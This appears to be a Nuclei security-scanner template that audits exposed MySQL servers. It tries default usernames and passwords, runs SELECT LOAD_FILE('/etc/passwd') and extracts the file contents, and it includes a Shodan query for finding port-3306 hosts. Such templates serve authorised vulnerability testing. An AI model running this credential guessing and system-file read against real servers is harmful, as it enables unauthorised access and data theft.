id: mysql-load-file
info:
  name: MySQL LOAD_FILE - Enable
  author: pussycat0x
  severity: high
  description: |
    The LOAD_FILE function in MySQL is potentially dangerous if not used carefully, as it can pose security risks. The function is designed to read the contents of a file on the server and return the file contents as a string. However, it can be exploited if not properly restricted or sanitized, leading to security vulnerabilities.
  reference:
    - https://nmap.org/nsedoc/scripts/mysql-databases.html
  metadata:
    verified: true
    max-request: 16
    shodan-query: "port:3306"
  tags: js,mysql,network,audit

javascript:
  - pre-condition: |
      isPortOpen(Host,Port);
    code: |
      let m = require('nuclei/mysql');
      let c = m.MySQLClient();
      let response = c.ExecuteQuery(Host,Port,User,Pass,Query);
      Export(response);

    args:
      Host: "{{Host}}"
      Port: "3306"
      Query: SELECT LOAD_FILE('/etc/passwd')
      User: "{{usernames}}"
      Pass: "{{passwords}}"

    payloads:
      usernames:
        - root
        - admin
        - mysql
        - test
      passwords:
        - root
        - admin
        - mysql
        - test
    attack: clusterbomb

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - success == true

      - type: word
        words:
          - "root:x:"

    extractors:
      - type: json
        part: response
        json:
          - .Rows[]
# digest: 4b0a00483046022100abcc3dba9d8ad8d8b9814f9a26fa4c4a2e3092998c466b6b92f7f9899a738e40022100f9ac346fa40811738f00b7966e7a747efb702ef048072946b4b037fae8d9633b:922c64590222798bb761d5b6d8e72950